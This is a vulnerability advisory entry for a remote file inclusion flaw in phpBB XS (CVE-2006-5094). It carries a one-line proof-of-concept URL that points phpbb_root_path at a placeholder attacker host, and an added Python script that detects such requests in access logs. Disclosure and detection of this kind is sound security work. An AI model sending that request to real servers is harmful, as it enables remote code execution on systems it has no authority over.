phpBB XS includes/functions_kb.php phpbb_root_path Variable Remote File Inclusion

2006-09-29T10:18:55
ID OSVDB:29283
Type osvdb
Reporter OSVDB
Modified 2006-09-29T10:18:55

Description

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Manual Testing Notes

http://[target]/path_to_phpbbXS2/includes/functions_kb.php?phpbb_root_path=http://[attacker]?
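A detection sketch for the request pattern in the testing note above, added here as an example and not part of the original advisory: it scans web server access logs for requests to includes/functions_kb.php whose phpbb_root_path parameter names a remote location. The log format (Apache/nginx combined), the function names and the sample lines are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Client IP, request target and status from a combined-format access log line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# Value that names a remote or wrapper resource (scheme: or //host), not a local path.
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.-]+:|//)', re.IGNORECASE)

def decode(value, rounds=3):
    """Undo repeated percent-encoding used to slip past simple filters."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_rfi_attempts(lines, script="includes/functions_kb.php",
                      param="phpbb_root_path"):
    """Return one record per request that sets `param` to a remote location."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if not decode(url.path).lower().endswith(script):
            continue
        for key, value in parse_qsl(url.query, keep_blank_values=True):
            value = decode(value)
            if key.lower() == param and REMOTE_RE.match(value):
                hits.append({"ip": m["ip"], "status": int(m["status"]),
                             "value": value})
    return hits

# Constructed sample log lines (documentation IP ranges, placeholder hosts).
SAMPLE_LOG = [
    '198.51.100.7 - - [29/Sep/2006:10:02:11 +0000] "GET /forum/includes/functions_kb.php?phpbb_root_path=http://remote.example/x.txt? HTTP/1.1" 200 512',
    '198.51.100.8 - - [29/Sep/2006:10:03:40 +0000] "GET /forum/includes/functions_kb.php?phpbb_root_path=%2568ttp%253A%252F%252Fremote.example%252Fx HTTP/1.1" 404 210',
    '192.0.2.44 - - [29/Sep/2006:10:05:02 +0000] "GET /forum/includes/functions_kb.php?phpbb_root_path=./ HTTP/1.1" 200 0',
    '192.0.2.45 - - [29/Sep/2006:10:06:19 +0000] "GET /forum/index.php HTTP/1.1" 200 8841',
]

if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG):
        print(hit)
```

With register_globals on, PHP also populates variables from POST bodies and cookies, which access logs normally do not record, so this check covers the query-string case only.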

References:

Vendor URL: http://www.phpbbxs.eu/
Secunia Advisory ID: 22177
Other Advisory URL: http://kernel-32.blogspot.com/2006/09/phpbb-xs-phpbbrootpath-remote-file.html
Mail List Post: http://www.securityfocus.com/archive/1/archive/1/447292/100/0/threaded
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0513.html
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0479.html
Keyword: SolpotCrew Advisory #14
ISS X-Force ID: 29250
Generic Informational URL: http://www.nyubicrew.org/adv/solpot-adv-10.txt
FrSIRT Advisory: ADV-2006-3843
CVE-2006-5094
Bugtraq ID: 20251